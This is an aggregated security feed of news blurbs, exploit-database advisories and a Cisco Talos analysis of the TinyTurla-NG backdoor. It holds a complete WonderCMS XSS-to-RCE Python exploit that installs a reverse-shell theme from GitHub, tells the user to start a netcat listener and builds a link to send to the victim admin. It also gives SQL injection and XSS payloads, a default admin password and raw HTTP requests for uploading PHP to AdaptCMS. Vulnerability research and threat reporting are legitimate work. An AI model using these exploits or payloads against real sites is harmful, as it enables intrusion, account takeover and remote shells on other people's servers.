Google Cloud Run is currently being abused in high-volume malware distribution campaigns, spreading several banking trojans such as Astaroth (aka Guildma), Mekotio and Ousaban to targets across Latin America and Europe.
The volume of emails associated with these campaigns has significantly increased since September 2023 and we continue to regularly

Astaroth, Mekotio & Ousaban abusing Google Cloud Run in LATAM-focused malware campaigns

A critical security flaw in the Bricks theme for WordPress is being actively exploited by threat actors to run arbitrary PHP code on susceptible installations.
The flaw, tracked as CVE-2024-25600 (CVSS score: 9.8), enables unauthenticated attackers to achieve remote code execution. It impacts all versions of the Bricks up to and including 1.9.6.
It has been addressed by the theme developers in&

WordPress Bricks Theme Under Active Attack: Critical Flaw Impacts 25,000+ Sites

InstantCMS version 2.16.1 suffers from a persistent cross site scripting vulnerability that appears to require administrative access.

    # Exploit Title: InstantCMS - Store XSS# Application: InstantCMS # Version: v2.16.1   # Bugs: Stored XSS# Technology: PHP# Vendor Homepage: https://instantcms.ru/# Software Link: https://instantcms.ru/get# Date: 14.09.2023# Author: SoSPiro# Tested on: Windows## DescriptionI noticed that you filtered the filter very carefully. But there are still some parts you missed## POC1 . Login with admin2 . Go to "http://localhost/o2/admin/menu/item_edit/18"3 . Insert payload in CSS class4 . Click save , and go to home page, and Detect store xss in footerhttps://drive.google.com/file/d/1_9QGoBnbZZrsHUgNkujja1Ptj3f8fl2W/view?usp=sharing## ImpactThis security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...## Bug fix commithttps://github.com/instantsoft/icms2/commit/b2172a0f842fc28966b00bab3e2e9094c6bfd156## Referencehttps://huntr.com/bounties/18546c85-de6a-4252-a02f-c9d26f4f775e/

InstantCMS 2.16.1 Cross Site Scripting

Online Library Management System version 3 suffers from a password reset vulnerability due to a logic flaw of allowing the same email address to be set for multiple users.

    # Exploit Title: Online Library Management System v3 - Password Reset and Email Matching Vulnerability# Date: 12.09.2023# Exploit Author: SoSPiro# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/online-library-management-system/# Version: v3# Tested on: Windows 10 Pro 64 Bit  + Wampserver V3.3# CVE: N/A## Description:This report outlines a security vulnerability present in the web application called [Application Name]. This vulnerability allows users to create multiple accounts with the same email address and use that email address during the password reset process. This situation can compromise the security of user accounts.## Risk Level:This vulnerability can lead to serious security risks, including unauthorized access to user accounts and identity theft. It has the potential to have a significant impact.## Step-by-Step Description:1. User creates an account as "user1," with the email address set as "user@gmail.com."2. User creates another account as "user2" and uses the same email address, "user@gmail.com."3. User2 initiates a password reset process when forgetting the password.4. As a result of the password reset process, the password for the "user1" account is also reset and can be controlled by "user2."

Online Library Management System 3 Password Reset

Employee Management System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

# Exploit Title: Employee Management System - SQL Injection  
# Google Dork: N/A  
# Application: Employee Management System   
# Date: 19.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html  
# Version: N/A  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information.

## Proof of Concept (PoC):

An example attacker could input the following into the email field instead of a valid email address:

In this case, the SQL query would look like:

SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active'  
As "1=1" is always true, the query would return positive results, allowing the attacker to log in.

## Vulnerable code section:  
====================================================  
employee/Admin/login.php

<?php  
session_start();  
error_reporting(1);  
include('../connect.php');

//Get website details  
$sql_website = "select * from website_setting";   
$result_website = $conn->query($sql_website);  
$row_website = mysqli_fetch_array($result_website);

if(isset($_POST['btnlogin'])){

//Get Date  
date_default_timezone_set('Africa/Lagos');  
$current_date = date('Y-m-d h:i:s');

$email = $_POST['txtemail'];  
$password = $_POST['txtpassword'];  
$status = 'Active';

 $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."'  and status = '".$status."'";  
  $result = mysqli_query($conn, $sql);

if (mysqli_num_rows($result) > 0) {  
  // output data of each row  
 ($row = mysqli_fetch_assoc($result));  
   $_SESSION["email"] = $row['email'];  
   $_SESSION["password"] = $row['password'];  
 $_SESSION["phone"] = $row['phone'];  
    $firstname = $row['firstname'];  
     $_SESSION["firstname"] = $row['firstname'];

     $fa = $row['2FA'];

  }

Employee Management System 1.0 SQL Injection

WonderCMS version 4.3.2 remote exploit that leverages cross site scripting to achieve remote code execution.

    # Author: prodigiousMind# Exploit: Wondercms 4.3.2 XSS to RCEimport sysimport requestsimport osimport bs4if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")else:  data = '''var url = "'''+str(sys.argv[1])+'''";if (url.endsWith("/")) { url = url.slice(0, -1);}var urlWithoutLog = url.split("/").slice(0, -1).join("/");var urlWithoutLogBase = new URL(urlWithoutLog).pathname; var token = document.querySelectorAll('[name="token"]')[0].value;var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;var xhr3 = new XMLHttpRequest();xhr3.withCredentials = true;xhr3.open("GET", urlRev);xhr3.send();xhr3.onload = function() { if (xhr3.status == 200) {   var xhr4 = new XMLHttpRequest();   xhr4.withCredentials = true;   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");   xhr4.send();   xhr4.onload = function() {     if (xhr4.status == 200) {       var ip = "'''+str(sys.argv[2])+'''";       var port = "'''+str(sys.argv[3])+'''";       var xhr5 = new XMLHttpRequest();       xhr5.withCredentials = true;       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);       xhr5.send();            }   }; }};'''  try:    open("xss.js","w").write(data)    print("[+] xss.js is created")    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))    print("----------------------------\n")    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""    XSSlink = XSSlink.strip(" ")    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)    print("----------------------------\n")    print("\nstarting HTTP server to allow the access to xss.js")    os.system("python3 -m http.server\n")  except: print(data,"\n","//write this to a file")

WonderCMS 4.3.2 Cross Site Scripting / Remote Code Execution

User Registration and Login and User Management System version 3.1 suffers from a remote SQL injection vulnerability.

#Exploit Title: User Registration & Login and User Management System With admin panel 3.1 - SQL injection  
# Application: User Registration & Login and User Management System  
# Date: 17.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/  
# Tested on: Windows 10 64 bit Wampserver 

## Description:  
The file bwdates-report-result.php contains a potential security vulnerability related to user input validation. The script retrieves user-provided date inputs without proper validation, making it susceptible to SQL injection attacks.

## Vulnerability Details:  
- **Application Name**: User Registration & Login and User Management System  
- **Software Link**: [Download Link](https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/)  
- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)

- The vulnerability lies in the following code snippet:

<?php  
$fdate=$_POST['fromdate'];  
$tdate=$_POST['todate'];

?>

<?php $ret=mysqli_query($con,"select * from users where date(posting_date) between '$fdate' and '$tdate'");  
$cnt=1;  
while($row=mysqli_fetch_array($ret))  
{?>

The script directly uses the user-supplied $fdate and $tdate variables in an SQL query without validating or sanitizing the input. This creates a potential avenue for malicious users to manipulate the query and perform SQL injection attacks.

## Vulnerability Description:

An attacker can exploit this vulnerability by crafting malicious input for the fromdate and todate parameters. By injecting SQL code into these fields, an attacker could manipulate the query to perform unauthorized actions on the database, potentially exposing sensitive information or even modifying the database contents.

## Proof of Concept (PoC):  
1. Visit the application locally at http://localhost/loginsystem/admin/ and login as admin  
admin user credentials which are installed by default

Username: admin  
Password: Test@12345

2. Go to "B/w Dates Report": http://localhost/loginsystem/admin/bwdates-report-ds.php  
3. Change the "To Datev" or "From Date" values. You can use this query by manipulating proxy tools like Burp Suite payload= "' OR '1'='1'; --".

User Registration And Login And User Management System 3.1 SQL Injection

An issue was discovered in REDAXO version 5.15.1, allows attackers to execute arbitrary code and obtain sensitive information via modules.modules.php.

**Code injection in REDAXO**

High severity GitHub Reviewed Published Feb 17, 2024 to the GitHub Advisory Database • Updated Feb 20, 2024

GHSA-7f2v-5877-rx3x: Code injection in REDAXO

This new backdoor we’re calling “TinyTurla-NG” (TTNG) is similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.

Thursday, February 15, 2024 08:00

*   Cisco Talos has identified a new backdoor authored and operated by the Turla APT group, a Russian cyber espionage threat group. This new backdoor we’re calling “TinyTurla-NG” (TTNG) is similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.
*   Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.
*   TinyTurla-NG was seen as early as December 2023 targeting a Polish non-governmental organization (NGO) working on improving Polish democracy and supporting Ukraine during the Russian invasion. 
*   We’ve also discovered previously unknown PowerShell scripts we’re calling “TurlaPower-NG '' that are meant to act as file exfiltrators. TinyTurla-NG deployed these scripts to exfiltrate key material used to secure the password databases of popular password management software, indicating a concerted effort for Turla to steal login credentials.

Talos, in cooperation with CERT.NGO, investigated another compromise by the Turla threat actor, with a new backdoor quite similar to TinyTurla, that we are calling TinyTurla-NG (TTNG). Our findings indicate that Polish non-governmental organizations (NGOs) are actively being targeted, with at least one of them supporting Ukraine. While NGOs aren’t directly involved in conflicts they frequently participate in providing aid to entities suffering through the conflicts. Aggressor parties may deem it strategically beneficial to monitor such NGOs to keep track of ongoing and potentially new aid packages for their victims.

Turla has been widely known to target entities across the world using a huge set of offensive tools in geographies including the U.S., European Union, Ukraine and Asia. They’ve previously used malware families such as CAPIBAR and KAZUAR to target Ukrainian defense forces. After Crutch and TinyTurla, Turla has now expanded its arsenal to include the TinyTurla-NG and TurlaPower-NG malware families, while also widening its net of targets to NGOs. This activity signals the adversary’s intention to expand both their suite of malware as well as a set of targets to support Russia’s strategic and political goals.

Talos identified the existence of three different TinyTurla-NG samples, but only obtained access to two of them. This campaign’s earliest compromise date was Dec. 18, 2023, and was still active as recently as Jan. 27, 2024. However, we assess that the campaign may have started as early as November 2023 based on malware compilation dates. 

In this campaign, Turla uses compromised WordPress-based websites as command and control endpoints (C2) for the TTNG backdoor. The operators used different websites running vulnerable WordPress versions (versions including 4.4.20, 5.0.21, 5.1.18 and 5.7.2), which allowed the upload of PHP files containing the C2 code consisting of names such as: rss-old\[.\]php, rss\[.\]old\[.\]php or block\[.\]old\[.\]php

**TinyTurla-NG uses PowerShell and a command line to run arbitrary commands**

During the campaign’s three-month run, different C2 servers were also used to host PowerShell scripts and arbitrary commands that could then be executed on the victim machine.

Like TinyTurla, the malware is a service DLL, which is started via svchost.exe. The malware code itself is different and new. Different malware features are distributed via different threads. The malware is using Windows events for synchronization. In the DLL’s ServiceMain function, the first main malware thread is started.

TinyTurla-NG DLL starting the main infection thread.

The InitCfgSetupCreateEvent function initializes the config variables and the event which is used for synchronization later on. 

De-facto main function of the DLL calling code to initiate threads.

This thread then starts two more threads via the CheckOSVersion\_StartWorkerThreads function.

CheckOSVersion\_Start\_WorkerThreads function.

After checking the PowerShell and Windows versions, the first thread starts to beacon to the C2 by sending a campaign identifier (“id”) and the message “Client Ready” to register the successful infection with the C2. This is done in the C2\_client\_ready function in the screenshot below.

Thread No. 1: C2 beaconing thread.

If the registration is successful, the TTNG backdoor will ask the C2 for a task to execute (gettask\_loop function). The second thread, which was started by the CheckOSVersion\_Start\_WorkerThreads function, is responsible for executing the task command sent from the C2. It waits until the TTNG backdoor has received the response from the C2. The synchronization between the two threads is performed via the Windows event mentioned earlier. The first thread triggers the event (in the thread1\_function) once it has successfully received the task from the C2.

Thread No. 1 signals Thread No. 2 to handle the task/command received from the C2.

The tasks can be executed either using a PowerShell or command (cmd.exe) shell. The decision is made based on the PowerShell version running on the victim machine.

Thread No. 2: Windows command execution function.

When executing commands via cmd.exe or PowerShell.exe, TinyTurla-NG will create pipes to input and read the output of the commands. While executing commands via cmd.exe, the backdoor first executes the command chcp 437 > NULexecute to set the active console page to 437, i.e., the U.S., and then execute the commands issued by the C2. 

However, while executing commands via PowerShell.exe, TinyTurla-NG will additionally execute the following PowerShell cmdlet to prevent the recording of command history:

Set-PSReadLineOption -HistorySaveStyle SaveNothing

In addition to executing the content of the task received from the C2 directly e.g., C:\windows\system32\malware.exe, the backdoor will accept the following command codes from the C2. These command codes can be meant for administering the implant or for file management:

*   **“timeout”**: Change the number of minutes the backdoor sleeps between asking the C2 for new tasks. The new timeout is one minute multiplied by the timeout parameter sent by the C2. For example, if the C2 sends the task “timeout 10”, then the backdoor will now sleep for 10 minutes. If it is given a third parameter, the fail counter is changed, too.

TTNG setting a timeout value for C2 communication.

*   **“changeshell”**: This command will instruct the backdoor to switch the current shell being used to execute commands, i.e., from cmd.exe to PowerShell.exe, or vice versa.
*   **“changepoint”**: This command is used to likely tell the implant to switch to the second C2 URL present in the implant.
*   **“get”**: Fetch a file specified by the C2 using an HTTP GET request and write it to the specified location on disk.
*   **“post”**: Exfiltrate a file from the victim to the C2, e.g., post C:\some_file.bin.
*   **“killme”**: Create a BAT file (see below) with a name based on the current tick count. Then, use the BAT file to delete a file from the disk of the victim machine, e.g., killme <filename>. The BAT file is executed via cmd.exe /c <BAT-file-name>.bat. 

The killme command generates a batch file with the content below. It is interesting to note that the backdoor DLL is essentially a service, however, the batch script deletes a registry key in HKCU\SW\classes\CLSID and restarts explorer\[.\]exe indicating an attempt to create persistence using COM hijacking, a tactic Turla has used in the past to establish persistence for their malware.

Registry key deleted:

HKEY\_CURRENT\_USER\\Software\\Classes\\CLSID\\{C2796011-81BA-4148-8FCA-C6643245113F}

BAT file contents template.

The BAT file is created from the template where the first two “%s” are replaced with the DLL name and the last one with the name of the BAT file itself to delete both artifacts from the disk.

**TurlaPower-NG and its exfiltration capabilities**

Talos also discovered malicious PowerShell scripts we’re calling “TurlaPower-NG”, written to infected endpoints via the TTNG backdoor. The scripts consist of the C2 URL and target file paths. For each file path specified, the script will recursively enumerate files and add them to an archive on disk. TurlaPower-NG takes specific care to exclude files with the “.mp4” extension from being added to the archive. The attackers had a specific interest in key material used to secure the password databases and popular password management software, adding related files to the archive:

TurlaPower-NG’s file archiving function.

The archive is a “.zip” extension whose name is generated on the fly by generating a new GUID which is used as the archive name. The archive file is then exfiltrated to the C2 using HTTP/S POST requests along with a log of the activity performed being sent to the C2 as well. The log consists of:

*   Name of the archive file (or part) POSTed to the C2.
*   Number of files in the archive along with the archive size.

TurlaPower-NG’s archive filename generation and log generation for C2.

**C2 setup and operations**

All of the C2 servers discovered so far consist of legitimate, vulnerable WordPress-based websites compromised by Turla to set up their C2 servers. Once compromised the operators set up scripts, logging and data directories to operate their C2 servers.

**Directory and file structure**

The C2’s directories and files setup consists of three key components:

*   **C2 scripts**: Turla set up PHP scripts ending with extensions — “.old.php” — in certain directories of the compromised websites. The URLs for these PHP-based C2s were then coded into the TTNG backdoors consisting of two C2 URLs per sample.
*   **Logging**: In addition to the C2 PHP scripts, the adversary also set up the logging of infections to keep track of infected systems and commands being issued to them. The logging mechanism of the C2 generates three log files on the C2 server:
    *   **\_log\[.\]txt**: A log of all infected endpoints beaconing into the C2.
    *   **result\[.\]txt**: A log of all messages received from the TTNG backdoor.
    *   **tasks\[.\]txt**: A log of all commands issued to the infected hosts.
*   **Data directories**: TTNG and TurlaPower-NG both support the exfiltration of files to the C2 server. The C2 server stores stolen data in directories separate from the logging directories.

Sample directory listing of the logs of the C2 server.

**C2 communication process**

The TinyTurla-NG backdoor uses a specific Identifier, “id” value in its HTTP form data whenever it communicates with the C2 server. This ID value is an eight-character phrase hardcoded into the backdoor. 

Network capture displaying the Identifier value and “Client Ready” message.

This same identifier value is then used to create directories for log files on the C2 server indicating that the C2 server maintains different log files for different identifiers.

After registering the victim on the C2 server, the backdoor sends out a gettask request, similar to the one below. The C2 can answer this with special commands or just the file that is supposed to be executed on the infected machine. 

TTNG’s C2 communication to fetch tasks to perform on the infected endpoint.

Depending on the PowerShell version running on the victim machine, the C2 task commands are piped into a PowerShell or cmd\[.\]exe shell. 

TinyTurla-NG’s shell selection between PowerShell or cmd\[.\]exe.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCs**

IOCs for this research can also be found at our GitHub repository here.

**Hashes**

267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b  
d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40

**Domains**

hanagram\[.\]jp  
thefinetreats\[.\]com  
caduff-sa\[.\]ch  
jeepcarlease\[.\]com  
buy-new-car\[.\]com  
carleasingguru\[.\]com

TinyTurla Next Generation - Turla APT spies on Polish NGOs

Adapt CMS version 3.0.3 suffers from persistent cross site scripting and remote shell upload vulnerabilities.

# Exploit Title: Stored XSS and RCE - adaptcmsv3.0.3  
# Date: 02/2024  
# Exploit Author: Andrey Stoykov  
# Version: 3.0.3  
# Tested on: Ubuntu 22.04  
# Blog: http://msecureltd.blogspot.com

 *Description*

- It was found that adaptcms v3.0.3 was vulnerable to stored cross  
site scripting

- Also the application allowed the file upload functionality to upload  
PHP files which resulted in remote code execution

*Stored XSS*

*Steps to Reproduce:*

   1. Login as admin and add a new article  
   2. In "Title" add the following payload <svg><animate  
onbegin=alert(1) attributeName=x dur=1s>  
   3. The stored XSS would be triggered upon visiting the article by  
normal user

// HTTP POST request

POST /adaptcms/admin/articles/preview/?preview=1 HTTP/1.1

Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

_method=PUT&data%5B_Token%5D%5Bkey%5D=357ba58e7871f0849edd3c623771a379e2fc1a2c&*data%5BArticle%5D%5Btitle%5D=%3Csvg%3E%3Canimate+onbegin%3Dalert(1)+attributeName%3Dx+dur%3D1s%3E*&data%5BArticleValue%5D%5B0%5D%5Bdata%5D=%3Cp%3ETest%3C%2Fp%3E[...]

// HTTP GET request

GET /adaptcms/admin/articles/preview HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

// HTTP response

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
[...]

[...]  
<!DOCTYPE html>  
<html lang="en">  
<head>  
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  *<title>*  
*    AdaptCMS 3.0.3 | <svg><animate onbegin=alert(1) attributeName=x  
dur=1s>  </title>*  
[...]

*Unrestricted File Upload*

*Steps to Reproduce:*

   1. Login as admin and visit the "Media" page  
   2. Click on "Files" then use the "Add File" functionality  
   3. In "File Contents" add the following PHP code <?php phpinfo(); ?>

// HTTP POST request

POST /adaptcms/admin/files/add HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

[...]  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
*Content-Disposition: form-data; name="data[0][File][dir]"*

*uploads/*  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
Content-Disposition: form-data; name="data[0][File][mimetype]"

------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
Content-Disposition: form-data; name="data[0][File][filesize]"

------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
*Content-Disposition: form-data; name="data[File][content]"*

*<?php phpinfo(); ?>*  
------WebKitFormBoundaryVO2wc6i6YcQWk3oU  
[...]

// HTTP response

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
X-Powered-By: PHP/5.6.40  
*Location: http://192.168.232.133/adaptcms/admin/files  
<http://192.168.232.133/adaptcms/admin/files>*  
[...]

// HTTP GET request

GET /adaptcms/uploads/*test-php.php* HTTP/1.1  
Host: 192.168.232.133  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63  
Safari/537.36  
[...]

// HTTP response

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40  
mod_perl/2.0.8-dev Perl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

[...]  
<h1 class="p">*PHP Version 5.6.40*</h1>  
</td></tr>  
</table>  
<table>  
<tr><td class="e">System </td><td class="v">*Linux ubuntu  
6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12  
18:54:30 UTC 2 x86_64* </td></tr>  
[...]

Tag

#php